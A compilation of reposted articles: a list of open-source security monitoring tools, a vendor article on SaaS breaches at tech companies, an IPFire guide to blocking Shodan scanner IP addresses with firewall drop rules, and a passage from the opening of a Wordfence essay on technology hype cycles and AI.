Top 20 Open Source Cyber Security Monitoring Tools in 2023

As cyber threats continue to evolve, security professionals require reliable tools to defend against security vulnerabilities, protect sensitive data, and maintain network security. Open source cyber security tools provide a cost-effective solution for individuals and organizations to combat these threats on-premises and with cloud security and mobile devices. Let’s consider the top 25 open-source cyber security monitoring tools in 2023 that help ensure continuous network and system performance monitoring.

Table of contents

What are the Top Cybersecurity Threats Today?

As cyber threats continue to evolve and become more sophisticated, organizations must stay informed and prepared to defend against a wide range of security risks.

Here are the top cybersecurity threats that businesses and individuals should be aware of today:

1. Phishing Attacks: Phishing attacks are a prevalent form of social engineering where cybercriminals use deceptive emails or websites to trick users into revealing sensitive information or installing malware. These attacks often target login credentials, financial information, and other personal data.

Altaro VM Backup

2. Ransomware: Ransomware is a type of malicious software that encrypts a victim’s files or locks their systems, demanding a ransom payment to restore access. Ransomware attacks can cause significant financial losses and operational disruptions for organizations.

3. Insider Threats: Insider threats refer to security risks posed by employees, contractors, or other individuals with authorized access to an organization’s systems and data. These threats can result from malicious intent or negligence, leading to data breaches or system compromises.

4. Supply Chain Attacks: Also known as third-party attacks or vendor risk, supply chain attacks target an organization’s suppliers, vendors, or partners to gain access to their systems and data. These attacks often exploit security vulnerabilities in the supply chain to compromise multiple organizations.

5. Distributed Denial of Service (DDoS) Attacks: DDoS attacks involve overwhelming a target’s network or system with a flood of traffic, rendering it inaccessible to legitimate users. DDoS attacks can cause severe downtime and service disruptions.

6. Advanced Persistent Threats (APTs): APTs are sophisticated, coordinated cyberattacks by well-funded threat actors or nation-state groups that target specific organizations for espionage, data theft, or sabotage. APTs often use advanced techniques and tactics to evade detection and maintain a long-term presence within a target’s network.

7. Zero-Day Exploits: Zero-day exploits are attacks that take advantage of previously unknown security vulnerabilities in software or systems. These vulnerabilities, also known as zero-day flaws, have no existing patches or fixes, making them particularly dangerous and challenging to defend against.

8. Internet of Things (IoT) Security: The increasing adoption of IoT devices and connected technologies has expanded the attack surface for cybercriminals. IoT devices are often vulnerable to cyber threats due to weak security measures, creating new risks for organizations and consumers.

9. Data Breaches: Data breaches occur when unauthorized individuals gain access to an organization’s sensitive data, such as customer information, financial records, or intellectual property. Data breaches can result in significant financial and reputational damage for organizations.

10. Cloud Security Threats: As more organizations migrate to cloud-based services, cloud security has become a critical concern. Threats in the cloud can arise from misconfigurations, weak authentication mechanisms, and vulnerabilities in cloud applications or infrastructure.

Benefits of Open-Source CyberSecurity tools

Open source cyber security monitoring tools offer numerous advantages over proprietary solutions, making them an attractive option for businesses, organizations, and individuals looking to enhance their security posture and perform effective security testing.

Here are some key benefits of using open-source tools for cyber security monitoring for monitoring services that pose security threats, even if you have another network monitoring system. Proper cybersecurity monitoring and access management are key to maintaining a secure environment.

Cost-Effectiveness

One of the most significant benefits of open-source cyber security tools is their cost-effectiveness. With no licensing fees or subscription costs, these free tools enable security teams to access powerful network monitoring solutions without breaking the bank.

This particularly benefits small businesses and startups with limited budgets, allowing them to allocate resources to other critical areas.

Customizability and Flexibility

Open-source network monitoring tools offer high customizability and flexibility, allowing security professionals to tailor the tools to their specific needs. This adaptability enables organizations to address unique security threats and vulnerabilities, ensuring a more robust security posture.

Additionally, the ability to integrate these tools with existing security infrastructure adds an extra layer of protection to network security.

Rapid Development and Updates

The open-source community is known for its rapid development and frequent updates. As new security threats and vulnerabilities emerge, open-source cyber security tools are often among the first to receive patches and updates.

This continuous monitoring and proactive response help organizations stay ahead of potential security risks and maintain a strong security posture.

Extensive Support and Collaboration

Open-source cyber security tools benefit from an extensive support network, comprising developers, users, and experts from around the world.

This collaborative environment fosters knowledge sharing, allowing security professionals to learn from one another and develop more effective security strategies.

Additionally, the availability of comprehensive documentation and online forums makes it easier for users to troubleshoot issues and enhance their understanding of network monitoring and security.

Improved Security and Transparency

With their source code openly available for inspection, open-source cyber security tools offer greater transparency than proprietary alternatives. This transparency allows security professionals and researchers to scrutinize the code for potential security vulnerabilities and ensure its integrity.

Moreover, the collaborative nature of the open-source community means that any identified issues are addressed quickly, further enhancing the overall security of these tools.

Platform Independence and Interoperability

Open-source network monitoring software often supports a wide range of operating systems, including Windows, macOS, and Linux, allowing organizations to deploy these tools across diverse environments.

This platform independence and interoperability help organizations ensure comprehensive network monitoring, regardless of the underlying infrastructure.

Top 25 Open Source Cyber Security Monitoring Tools in 2023

Note the following free cyber security monitoring tools in 2023 and the open-source list of solutions you can take advantage of and no free trial needed.

1. Wireshark: Network Protocol Analyzer

Wireshark is a widely-used network protocol analyzer that enables security teams to troubleshoot, analyze, and monitor network traffic in real-time to detect security issues. It is a defacto standard network monitoring tool.

command line interface data packets open source platform data breaches packet capture web apps network packets computer security experts solarwinds security event manager security scanning

By dissecting network protocols, Wireshark provides valuable insights into potential security risks and network vulnerabilities, allowing professionals to identify and resolve issues efficiently with the Wireshark network monitoring solution.

You can monitor a wide range of protocols, including TCP/IP, simple network management protocol, FTP, and many others. If you are looking for a network monitor this is it.

2. Snort: Network Intrusion Detection and Prevention System

Snort is a powerful open-source intrusion detection and prevention system (IDPS) that monitors network traffic and detects potential security threats.

It provides real-time traffic analysis, packet logging, and alerting capabilities, making it an essential tool for security auditing and network monitoring.

3. OSSEC: Host-Based Intrusion Detection System

OSSEC is a comprehensive host-based intrusion detection system (HIDS) that offers log analysis, file integrity checking, rootkit detection, and more.

It supports various operating systems, including Linux, Windows, and macOS, and helps security professionals monitor and analyze network protocols for potential security vulnerabilities.

4. Security Onion: Intrusion Detection and Network Security Monitoring Distribution

Security Onion is a Linux distribution specifically designed for intrusion detection, network security monitoring, and log management.

With a suite of powerful open-source tools, including Snort, Suricata, and Zeek, Security Onion provides a robust solution for security teams to monitor networks and detect security breaches.

5. Nmap: Network Scanning and Discovery Tool

Nmap is a versatile network scanning and discovery tool that helps security professionals identify network devices, open ports, and running services.

It is an essential network monitoring software for vulnerability management, penetration testing, and network inventory management.

6. Kismet: Wireless Network Detector, Sniffer, and Intrusion Detection System

Kismet is a wi fi security tool that detects, sniffs, and analyzes wireless networks. By monitoring wireless network traffic, Kismet identifies potential security risks, network vulnerabilities, and unauthorized users, making it an invaluable tool for wireless network security.

7. Suricata: High-Performance Network Intrusion Detection and Prevention Engine

Suricata is an open-source, high-performance network intrusion detection and prevention engine that provides real-time network traffic analysis, threat detection, and alerting.

Suricata enables security professionals to maintain network integrity and security by employing advanced threat defense and anomaly detection techniques.

8. Zeek (formerly Bro): Network Analysis Framework for Security Monitoring

Zeek, previously known as Bro, is a powerful network analysis framework that offers real-time insight into network traffic.

With its flexible scripting language and extensible plugin architecture, Zeek provides comprehensive visibility into network activity, enabling security teams to detect and prevent security threats.

9. OpenVAS: Vulnerability Scanning and Management Solution

OpenVAS is a comprehensive vulnerability scanning and management solution that helps security professionals identify, assess, and remediate security vulnerabilities.

With its extensive plugin library, OpenVAS ensures continuous monitoring and up-to-date vulnerability information, making it a critical tool for vulnerability management.

10. ClamAV: Open-Source Antivirus Engine

ClamAV is an open-source antivirus engine that detects trojans, viruses, and other malicious software.

It offers a command-line scanner, a graphical user interface (GUI) for Windows operating system, and integration with mail servers, ensuring that your systems are protected from security threats.

11. Fail2Ban: Log-Parsing Application to Protect Against Brute-Force Attacks

Fail2Ban is a log-parsing application that monitors log files for malicious activity, such as repeated failed login attempts. Fail2Ban bans the offending IP address when a potential attack is detected, effectively protecting your network from brute-force attacks and unauthorized access.

12. AlienVault OSSIM: Open-Source Security Information and Event Management Platform

AlienVault OSSIM is an open-source security information and event management (SIEM) platform that provides real-time event correlation, log analysis, and threat intelligence.

By integrating multiple security tools, OSSIM helps security teams maintain a unified user interface and enhance their overall security posture.

13. Cuckoo Sandbox: Automated Malware Analysis System

Cuckoo Sandbox is an open-source automated malware analysis system that enables security professionals to analyze suspicious files and URLs in a safe, isolated environment.

It provides detailed reports on malware behavior, including network traffic analysis, file system changes, and API traces, helping security teams identify and mitigate security risks.

14. Logstash: Log Processing and Management Tool

Logstash is part of the Elastic Stack (ELK Stack) and offers log processing and management capabilities.

It collects, parses, and stores log data from various sources, making it an essential tool for security professionals to monitor and analyze network activity, detect security breaches, and maintain system performance.

15. pfSense: Open-Source Firewall and Router Distribution

pfSense is an open-source firewall and router distribution based on FreeBSD. It offers a powerful and flexible network security, traffic shaping, and VPN connectivity solution.

With its extensive features and customization options, pfSense is ideal for securing web servers and internal networks.

16. ModSecurity: Open-Source Web Application Firewall

ModSecurity is an open-source web application firewall (WAF) providing real-time security monitoring and access control. It detects and prevents web attacks, protects sensitive data, and helps security professionals maintain compliance with industry standards and regulations.

17. AIDE (Advanced Intrusion Detection Environment): File and Directory Integrity Checker

AIDE is a file and directory integrity checker that monitors system files for unauthorized changes. It detects modifications, deletions, and additions, allowing security teams to maintain system integrity and prevent security breaches.

18. Graylog: Open-Source Log Management Platform

Graylog is an open-source log management platform that centralizes and analyzes log data from various sources.

Graylog helps security professionals detect security threats, identify network vulnerabilities, and maintain network security by providing comprehensive visibility into network activity.

19. Wazuh: Security Monitoring and Compliance Solution

Wazuh is a free, open-source security monitoring and compliance solution that integrates host-based and network-based intrusion detection systems, file integrity monitoring and security policy enforcement.

Wazuh’s centralized management and powerful analytics capabilities make it an essential tool for security teams to detect and respond to security threats.

20. T-Pot: Honeypot Platform

T-Pot is a platform combining multiple honeypots into a single, easy-to-deploy solution for cyber security monitoring. By simulating vulnerable systems and services, T-Pot attracts attackers and collects threat data, providing valuable insights into current attack trends and techniques.

Honorable mentions

Samhain: Host-Based Intrusion Detection System

Samhain is a host-based intrusion detection system (HIDS) that provides file integrity checking and log file monitoring. It detects unauthorized modifications, deletions, and additions, helping security professionals maintain system integrity and prevent security breaches.

SELKS: Network Security Management ISO with Suricata

SELKS is a live and installable network security management ISO based on Debian, focusing on a complete and ready-to-use Suricata IDS/IPS ecosystem. It offers a user-friendly interface and powerful analytics tools, making it an ideal choice for security teams to monitor networks and detect potential security threats.

Squid: Open-Source Web Proxy Cache and Forward Proxy

Squid is an open-source web proxy cache and forward proxy that improves web performance and security. By caching frequently-requested web content and filtering web traffic, Squid helps reduce bandwidth usage, enhance user privacy, and protect against web-based security threats.

YARA: Pattern-Matching Tool for Malware Researchers

YARA is a pattern-matching tool designed for malware researchers to identify and classify malware samples. By creating custom rules and signatures, YARA enables security professionals to detect and analyze malicious software, enhancing their understanding of current malware trends and techniques.

Arkime (formerly Moloch): Large-Scale, Open-Source, Indexed Packet Capture and Search System

Arkime is a large-scale, open-source, indexed packet capture and search system that provides comprehensive visibility into network traffic. It enables security professionals to analyze network protocols, detect security vulnerabilities, and identify potential security threats, making it an essential tool for network monitoring and security auditing.

Tips to Improve Your Cybersecurity Posture

Improving your cybersecurity posture is essential for safeguarding your organization from various cyber threats. Here are some practical tips to help enhance your cybersecurity defenses:

  1. Implement Regular Security Audits: Conducting routine security audits can help identify potential weaknesses in your organization’s cybersecurity infrastructure.
  2. This includes checking for outdated software, misconfigured settings, and other vulnerabilities that may expose your systems to attacks.
  3. Keep Software and Systems Updated: Regularly update your software, operating systems, and firmware to protect against known vulnerabilities and exploits.
  4. This includes applying security patches and updates as soon as they become available.
  5. Use Strong Authentication Mechanisms: Implement multi-factor authentication (MFA) for all critical systems and applications.
  6. MFA adds an extra layer of security by requiring users to provide additional verification, such as a one-time code or biometric authentication, in addition to their password.
  7. Encrypt Sensitive Data: Encrypt sensitive data both in transit and at rest to prevent unauthorized access. This includes using secure communication protocols, such as HTTPS and TLS, and implementing encryption solutions for data storage.
  8. Establish a Strong Password Policy: Enforce a robust password policy that requires users to create complex, unique passwords and update them regularly. Additionally, consider using a password manager to help users manage and store their passwords securely.
  9. Educate Employees on Cybersecurity Best Practices: Provide ongoing security awareness training to educate employees about common cyber threats, safe online practices, and how to recognize and report potential security incidents.
  10. Implement Network Segmentation: Divide your network into smaller segments, isolating critical systems and data from less secure areas. This can help prevent the spread of malware and limit the damage in case of a security breach.
  11. Regularly Backup Important Data: Regularly back up essential data and store copies offsite or in the cloud. This ensures that you can quickly recover from data loss or ransomware attacks.
  12. Utilize Endpoint Security Solutions: Deploy comprehensive endpoint security solutions to protect devices connected to your network.
  13. This includes antivirus software, firewalls, intrusion detection and prevention systems, and device management tools.
  14. Monitor and Analyze Network Traffic: Use network monitoring tools to analyze network traffic, detect anomalies, and identify potential security threats. Regular monitoring can help detect and respond to security incidents more effectively.
  15. Develop a Cybersecurity Incident Response Plan: Create a detailed incident response plan outlining the steps to take in a security breach. Regularly review and update the plan, and ensure that all employees are familiar with the procedures.
  16. Collaborate with Security Professionals: Engage with cybersecurity experts or managed service providers to help develop and maintain a strong security posture.
  17. This can provide access to specialized knowledge and resources to stay up-to-date with the latest threats and best practices.

Frequently Asked Questions (FAQs)

1. What are the best open-source cyber security monitoring tools available in 2023?

This blog post covers the top 25 open-source cyber security monitoring tools in 2023, including Wireshark, Snort, OSSEC, Security Onion, Nmap, Kismet, Suricata, Zeek, OpenVAS, ClamAV, and more.

These tools provide comprehensive network monitoring, threat detection, and vulnerability management capabilities to help organizations maintain a robust security posture.

2. Why choose open-source cyber security monitoring tools over proprietary alternatives?

Open-source cyber security monitoring tools offer several advantages: cost-effectiveness, customizability, rapid development and updates, extensive support, improved security, and platform independence.

These benefits make open-source tools attractive for organizations looking to enhance their network security and protect sensitive data.

3. How can I improve my organization’s cybersecurity hygiene?

In addition to utilizing open-source cyber security monitoring tools, organizations can improve their cybersecurity hygiene by implementing security awareness training, regularly updating software and systems, employing strong password policies, using multi-factor authentication, monitoring network traffic, and conducting regular security audits and penetration testing.

4. What is the importance of continuous monitoring in cybersecurity?

Continuous monitoring plays a crucial role in identifying and addressing security threats and vulnerabilities in real-time.

By regularly analyzing network traffic, security professionals can detect potential issues, respond to incidents promptly, and ensure the safety and integrity of their digital assets.

5. How can I protect my web applications from security threats?

Web application security can be improved by using tools such as ModSecurity, an open-source web application firewall (WAF) that provides real-time application security monitoring and access control.

Regularly updating web applications, conducting vulnerability assessments, and implementing secure coding practices can also help mitigate security risks.

6. What role do threat intelligence and threat data play in cybersecurity?

Threat intelligence and threat data help security professionals understand the latest trends, tactics, and techniques cybercriminals use.

Organizations can proactively address potential issues and maintain a strong security posture by staying informed about emerging threats and vulnerabilities.

7. Are open-source cyber security monitoring tools suitable for small businesses and startups?

Yes, open-source cyber security monitoring tools are ideal for small businesses and startups, as they offer cost-effective and powerful network monitoring solutions.

These tools enable organizations with limited budgets to access advanced security features without incurring high licensing fees or subscription costs.

Wrapping up

The ever-evolving landscape of cyber threats demands reliable and effective tools for security professionals to protect networks, systems, and sensitive data.

These Top 20 open-source cyber security monitoring tools in 2023 provide a comprehensive network monitoring, threat detection, and vulnerability management solution.

By incorporating these tools into your security strategy, you can enhance your overall security posture and ensure the safety and integrity of your digital assets.

Source :
https://www.virtualizationhowto.com/2023/05/top-20-open-source-cyber-security-monitoring-tools-in-2023/

Why High Tech Companies Struggle with SaaS Security

It’s easy to think high-tech companies have a security advantage over other older, more mature industries. Most are unburdened by 40 years of legacy systems and software. They draw some of the world’s youngest, brightest digital natives to their ranks, all of whom consider cybersecurity issues their entire lives.

Perhaps it is due to their familiarity with technology that causes them to overlook SaaS security configurations. During the last Christmas holiday season, Slack had some private code stolen from its GitHub repository. According to Slack, the stolen code didn’t impact production, and no customer data was taken.

Still, the breach should serve as a warning sign to other tech companies. Stolen tokens allowed threat actors to access the GitHub instance and download the code. If this type of attack can happen to Slack on GitHub, it can happen to any high-tech company. Tech companies must take SaaS security seriously to prevent resources from leaking or being stolen.

App Breaches: A Recurring Story#

Slack’s misfortune with GitHub wasn’t the first time a GitHub breach occurred. Back in April, a stolen OAuth token from Heroku and Travis CI-maintained OAuth applications were stolen, leading to an attacker downloading data from dozens of private code repositories.

MailChimp, a SaaS app used to manage email campaigns, experienced three breaches over 12 months spanning 2022-23. Customer data was stolen by threat actors, who used that data in attacks against cryptocurrency companies.

SevenRooms had over 400 GB of sensitive data stolen from its CRM platform, PayPal notified customers in January that unauthorized parties accessed accounts using stolen login credentials, and Atlassian saw employee data and corporate data exposed in a February breach.

Clearly, tech companies aren’t immune to data breaches. Protecting their proprietary code, customer data, and employee records that are stored within SaaS applications should be a top priority.

Reliance on SaaS Applications#

A strong SaaS posture is important for any company, but it is particularly important for organizations that store their proprietary code in SaaS applications. This code is especially tempting to threat actors, who would like nothing more than to monetize their efforts and ransom the code back to its creators.

Tech companies also tend to rely on a large number and mix of SaaS applications, from collaboration platforms to sales and marketing tools, legal and finance, data warehouses, cybersecurity solutions, and many more – making it even more challenging to secure the entire stack.

Tech employees heavily depend on SaaS apps to do their day-to-day work; this requires security teams to strictly govern identities and their access. Moreover, these users tend to log into their SaaS apps through different devices to maintain efficiency, which may pose a risk to the organization based on the device’s level of hygiene. On top of this, tech employees tend to connect third-party applications to the core stack without thinking twice, granting these apps high risk scopes.

Learn how Adaptive Shield can help you secure your entire SaaS stack.

Controlling SaaS Access After Layoffs#

The high-tech industry is known for periods of hyper-growth, followed by downsizing. Over the past few months, we’ve seen Facebook, Google, Amazon, Microsoft, LinkedIn, Shopify and others announce layoffs.

Deprovisioning employees from SaaS applications is a critical element in data security. While much of the offboarding of employees is automated, SaaS applications that are not connected to the company directory don’t automatically revoke access. Even those applications that are connected may have admin accounts that are outside the company’s SSO. While the primary SSO account may be disconnected, the user’s admin access through the app’s login screen is often accessible.

Organic Hyper Growth and M&As#

At the same time, the industry is ripe with mergers and acquisition announcements. As a result of M&As, the acquiring company needs to create a baseline for SaaS security and monitor all SaaS stacks of merged or acquired companies, while enabling business continuity. Whether the hyper growth is organic or through an M&A, organizations need to be able to ensure access is right-sized for their users, at scale and rapidly.

Identity Threat Detection & Response#

The majority of data breaches impacting tech companies stem from stolen credentials and tokens. The threat actor enters the system through the front door, using valid credentials of the user.

Identity Threat Detection and Response (ITDR) picks up suspicious events that would otherwise go unnoticed. An SSPM (SaaS Security Posture Management) solution with threat detection engines in place will alert when there is an Indicator of Compromise (IOC). These IOCs are based on cross-referencing of activities such as user geolocation, time, frequency, recurring attempts to login, excessive activities and more.

Securing High Tech’s SaaS#

Maintaining a high SaaS security posture is challenging for high tech companies, who may mistakenly believe they are equipped and well trained to prevent SaaS attacks. SaaS Security Posture Management is essential to preventing SaaS breaches, while an SSPM with ITDR capabilities will go a long way toward ensuring that your SaaS data is secure.

Learn how Adaptive Shield can help you secure your entire SaaS stack.

Source :
https://thehackernews.com/2023/05/why-high-tech-companies-struggle-with.html

How to block Shodan scanners

Shodan is a search engine which does not index web sites or web contents, but vulnerable devices on the internet. To set up this index and to keep it up to date, Shodan uses at least 16 scanners with different AS numbers and different physical locations.

In case you want to block those scanners, this guide might help.

Set up host definitions

First, set up host definitions in the firewall menu and put in the following hosts (it might be useful to put in the rDNS name as a hostname):

Known Shodan scanners (last updated 2022-02-16)

rDNS nameIP addressLocation
shodan.io ((it is unclear if this is a scanner IP))208.180.20.97US
census1.shodan.io198.20.69.74US
census2.shodan.io198.20.69.98US
census3.shodan.io198.20.70.114US
census4.shodan.io198.20.99.130NL
census5.shodan.io93.120.27.62RO
census6.shodan.io66.240.236.119US
census7.shodan.io71.6.135.131US
census8.shodan.io66.240.192.138US
census9.shodan.io71.6.167.142US
census10.shodan.io82.221.105.6IS
census11.shodan.io82.221.105.7IS
census12.shodan.io71.6.165.200US
atlantic.census.shodan.io188.138.9.50DE
pacific.census.shodan.io85.25.103.50DE
rim.census.shodan.io85.25.43.94DE
pirate.census.shodan.io71.6.146.185US
ninja.census.shodan.io71.6.158.166US
border.census.shodan.io198.20.87.98US
burger.census.shodan.io66.240.219.146US
atlantic.dns.shodan.io209.126.110.38US
blog.shodan.io ((it is unclear if this is a scanner IP))104.236.198.48US
hello.data.shodan.io104.131.0.69US
www.shodan.io ((it is unclear if this is a scanner IP))162.159.244.38US

The additional following entries have been added on September, 2019:

rDNS nameIP addressLocation
battery.census.shodan.io93.174.95.106SC
cloud.census.shodan.io94.102.49.193SC
dojo.census.shodan.io80.82.77.139SC
flower.census.shodan.io (PTR only)94.102.49.190SC
goldfish.census.shodan.io185.163.109.66RO
house.census.shodan.io89.248.172.16SC
inspire.census.shodan.io (PTR only)71.6.146.186US
mason.census.shodan.io89.248.167.131SC
ny.private.shodan.io159.203.176.62US
turtle.census.shodan.io (PTR only)185.181.102.18RO
sky.census.shodan.io80.82.77.33SC
shodan.io (PTR only)216.117.2.180US

The additional following entries have been added on February, 2022:

rDNS nameIP addressLocation
einstein.census.shodan.io71.6.199.23US
hat.census.shodan.io185.142.236.34NL
red.census.shodan.io185.165.190.34US
soda.census.shodan.io71.6.135.131US
wine.census.shodan.io185.142.236.35NL

The additional following entries have been added on 21st September, 2022:

rDNS nameIP addressLocation
wall.census.shodan.io66.240.219.133US
floss.census.shodan.io143.198.225.197US
dog.census.shodan.io137.184.95.216US
draft.census.shodan.io64.227.90.185US
can.census.shodan.io143.198.238.87US
pack.census.shodan.io137.184.190.205US
jug.census.shodan.io137.184.112.192US
elk.census.shodan.io137.184.190.188US
tab.census.shodan.io167.172.219.157US
buffet.census.shodan.io143.110.239.2US
deer.census.shodan.io143.198.68.20US

The additional following entries have been added on 30th September, 2022:

rDNS nameIP addressLocation
sparkle.census.shodan.io137.184.190.194US
fish.census.shodan.io137.184.190.246US
heimdal.scan6x.shodan.io (PTR only)137.184.9.17US
gravy.scanf.shodan.io (PTR only)137.184.13.100US
scanme.scanf.shodan.io (PTR only)137.184.94.133US
frame.census.shodan.io (PTR only)137.184.112.103US
collector.chrono.shodan.io (PTR only)137.184.180.190US
ships.data.shodan.io143.198.50.234US

The additional following entries have been added on 30th September, 2022. These were obtained by using the above IP addresses and then scanning any /16 subnet with more than one IP address in it. They have not necessarily been seen scanning. Note the the same rDNS record can be returned by multiple IPs:

rDNS nameIP addressLocation
green.census.shodan.io185.142.236.36NL
blue.census.shodan.io185.142.236.40NL
guitar.census.shodan.io185.142.236.41NL
blue2.census.shodan.io185.142.236.43NL
red2.census.shodan.io185.142.239.16NL
census2.shodan.io198.20.69.96/29US
census3.shodan.io198.20.70.112/29US
border.census.shodan.io198.20.87.96/29US
census4.shodan.io198.20.99.128/29NL
malware-hunter.census.shodan.io66.240.205.34US
refrigerator.census.shodan.io71.6.146.130US
board.census.shodan.io71.6.147.198US
tesla.census.shodan.io71.6.147.254US
thor.data.shodan.io71.6.150.153US
grimace.data.shodan.io71.6.167.125US
house.census.shodan.io89.248.172.7NL

Sources: own research, log reviews.

Contributor Note!
if you DROP ranges that were in the notorious “AS29073 Quasi Networks LTD” already, you’re already banning the “SC” (Seychelles) sources detailed above; those ranges have been inherited by AS202425. “AS9009 M247 Ltd” contributes to most of the “RO” (Romania) sources; furtherly M247 (AS9009) seem to be the exit point of most NordVPN/pureVPN and many low cost script-kiddies VPN. Firewalling them is usefull for `quietness. Interactions between shodan and m247 seems to be very close.

You might add a comment to each host, such as “scanner” or “shodan” to make clear why you added those.

It is possible to block other common scanners here, too. However, please keep in mind that this isn’t a technique which is very scalable. Please consider running an IPS, if possible.

Project 25499 scanners (last updated 2016-02-28)

rDNS nameIP addressLocation
scanner01.project25499.com98.143.148.107US
scanner02.project25499.com155.94.254.133US
scanner03.project25499.com155.94.254.143US
scanner04.project25499.com155.94.222.12US
scanner05.project25499.com98.143.148.135US

Source: http://project25499.com/

Set up firewall group

Second, set up a firewall group and add all those host entries to it. Add a title and a comment to this firewall group. In this guide, we assume you have named the group “shodanscanners”.

Set up firewall rule

Third, create a new firewall rule. Set the “shodanscanners” group as source. For destination, use “standard networks” and set this to “any”. Set “rule action” to “drop”.

The setting “reject” is not recommended here, since the firewall will send an ICMP status message to the host(s) which triggered the firewall rule. By this, however, the host knows that there is something which at least sends ICMP errors back. To avoid this, “drop” is suitable because the network packets will be dropped silently and there is no way of telling (without additional scans) wether the target IP address is just down or drops network packages.

Enter a comment, if you want to and hit “add” to set the new firewall rule.

Please make sure that this rule is placed before rules which accept something (i.e. port forwarding rules) so that shodan scan traffic will be blocked instantly.

Reload the firewall engine to apply the new rule.

Limitations of this rule

The OpenVPN service will not be protected – OVPNINPUT firewall chain is above the chain where this rule will land.

Limitations of this guide

Nobody (and nothing) is perfect. This guide isn’t either. 😉

For example, if the IP addresses of the Shodan scanners change, your firewall rule will be probably useless and does not provide any protection against the scanners any more. Consider setting up an IPS for additional protection since some rules there will also block other scanners which are not mentioned here.

Blocking Shodan scanner is fine, but I want to block all scanners
This is basically possible. However, it is a nightmare to set up a firewall host group which covers all IPs which belong to scanners. (And it is also a nightmare to find out those IP addresses since most scanners do not just put them on their web sites…) In case you are thinking similar, setting up an IPS in combination with suitable rules (this is just one example, there are many out there) might be a solution for you.

Source :
https://wiki.ipfire.org/configuration/firewall/blockshodan

Friday Long Read: What To Do About AI

This is a Friday long-read, so grab a warm cup of something and kick back because we’re going to take our time on this. The world is about to profoundly change. I know you’re nervous – perhaps excited and optimistic, but if you’ve been paying attention and have been watching the trajectory of this thing, the rational reaction is to be nervous. In this post I’d like to unpack in practical and tangible terms what AI is, where it came from, and the state of play, and then I’ll show you a path that will give you a pretty good shot at surviving the coming revolution.

Who am I? I’m Mark Maunder and I founded Wordfence in 2011 and wrote the early versions of the product until 2015 when Matt Barry took over as lead developer and I morphed into a tech executive running Defiant Inc, which makes Wordfence. We have over 4 million customers using our free product and a large number of paying customers using our various paid WordPress security products. I’ve been a technologist since the early 90s and a kid hacker in my teens in the 80s and 90s. I started my career in mission-critical operations for companies like Coca-Cola, Credit Suisse (now UBS), and DeBeers and then went over to do dev for companies like the BBC and eToys which was one of the biggest dot-com busts. I created the first job meta-search called WorkZoo in the UK around 2001 which later competed with Indeed, launched after us, and which I sold in 2005 but which made Time Magazine and NYTimes. I subsequently launched a Geoblogging platform, inline comments via JS, an ad network, real-time analytics, a localized news website, and more. You could say I’ve been in the innovation game for a minute, and I’m in it for life. I’m based in the USA these days in case you’re curious – moved over here in 2003.

Examining Bubbles

My apologies for the long bio, but what I’d like to illustrate is that I’ve seen tech come and go. The hype cycles I’ve seen typically include:

  • Outlandish claims about how the tech will solve everything from slicing bread to world peace and everything in between.
  • Commercial vendors jumping on the emerging mega-trend to surf the wave with proprietary technologies of their own which they position as standards, or at the very least the default choice.
  • Nascent technologies implementing the tech, that are immature, unstable, rapidly changing, and may very well be abandoned in a few months or a few years.
  • The press contracting a bad case of rabies and foaming at the mouth about the tech, amplifying the most extreme aspects and use cases and creating a lot of noise, which makes it hard for implementors to sift for the truth and the fundamentals around the technology.
  •  The investment community pouring cash into the space with little focus. This creates an extremely adversarial environment for tech practitioners who are building fundamental value, who now have to compete with powerful VC-backed marketing machines.
  • As Warren Buffet says, the Innovators, the Imitators, and the Swarming Incompetents enter the space in that order. I’d add that they have a pyramid structure with each successive wave being at least an order of magnitude bigger than the last. Things get crowded for a while.
  • Then you have the typical bust cycle which cleans house and makes the tech uncool again, but also makes it interesting to the true believers. The VC’s go away and stop making noise that innovators have to compete against. The imitators and swarming incompetents drift off to imitate and mess up something else. The businesses not creating fundamental value fail. Some creating fundamental value fail too but the talent and tech are sometimes reincarnated into something else useful.

So who prospers, and what tech survives after a bust? Sometimes none of it, but helpful derivative technologies are created, like Java Applets in the 90s that inspired Flash which inspired standards-based rich content web browsers.

A technological phoenix rising from the ashes

Sometimes out of the ashes, an Amazon is born, as with the dot-com boom. And sometimes you have incredible innovation where the innovators never see large-scale commercial success, but others do, as with Igor Sysoyev who created Nginx which eliminated the need for a data center full of web servers to handle large-scale websites. Igor has a commercial thing, but the real winners were companies like Cloudflare who based their global infrastructure on Nginx, reverse proxying massive numbers of connections to origin servers with rules about what gets proxied. Hey, I benefited too. Nginx saved our behinds when Kerry and I were running Feedjit.com from 2007 to 2011 because it let us handle over 1 billion application requests per month on just 6 servers. Thanks Igor!

Blockchain technology is in a bust cycle and you can map the characteristics I defined above to blockchain. It looks eerily similar to the dot-com bust and you’ll see an Amazon emerge from the ashes about a decade from now. It might be Coinbase if they survive the over 80% dive in market cap that may continue, but who knows?

Derivative Versus Fundamental Technology Innovation

Seeing the forest for the trees

I’ve mentioned a few tech bubbles so far and it’s really the first step in pulling us out of the trees so that we can examine the various forests out there. Now let’s go a little more meta and talk about which forests matter. Some technology is derivative. Examples of derivative tech are new stuff that runs inside a browser, for example, Websockets.

Websockets are awesome because they let a browser keep a connection open and get push notifications without doing the old TCP three-way handshake to establish a new connection every time the browser wants to check if there’s data waiting on a chat server or whatever. We used to call this long-polling and I wrote a web server to do long polling which was a clumsy but necessary approach, so when Web Sockets came along we all breathed a sigh of relief and I happily retired my web server glad that no one would see my nasty source code which worked quite well mind you.

Another derivative technology – and you’re not going to like this – is blockchain. It’s a useful and novel implementation of hashing algorithms and a few other cryptographic tricks, but honestly, we should have disintermediated banking at least two decades ago and the fact that blockchain has still failed to do that is both disappointing and illustrative that it is just a set of derivative applications built on a tower of fundamentals that has a way to go before it matures. The hype cycle and speculative bubble around it was simply humans making human noise.

So that’s derivative tech. In addition to derivative tech, you have what I’d like to call fundamental tech. Electricity is fundamental. It’s cornerstone technology that transformed the world in our ability to use and transport energy which has enabled an industrial and technological revolution the likes of which the world has never seen. The microprocessor is also fundamental tech for similar reasons. You have algorithms that are fundamental tech like the RSA algorithm which allows us to establish a secure communication channel while a bad person is listening in the whole time – the kind of tech that could have changed the outcome of World War II.

The Internet is fundamental tech. It connected the world and gave us the ability to build applications on top like HTTP and the web which are derivative tech.

Oh I know you want to have a bar fight with me at this point and we’ll do that if you’re attending Wordcamp EU – a collegial and metaphorical barfight, that is – but hopefully, you’re picking up what I’m putting down here in a general sense: There is fundamental tech that profoundly enables and changes the world and which many other things are built on top of, and there is derivative tech that gets a lot of attention but isn’t quite as transformative in a historical sense if you’re thinking in terms of centuries. And there’s the big fat grey area in between.

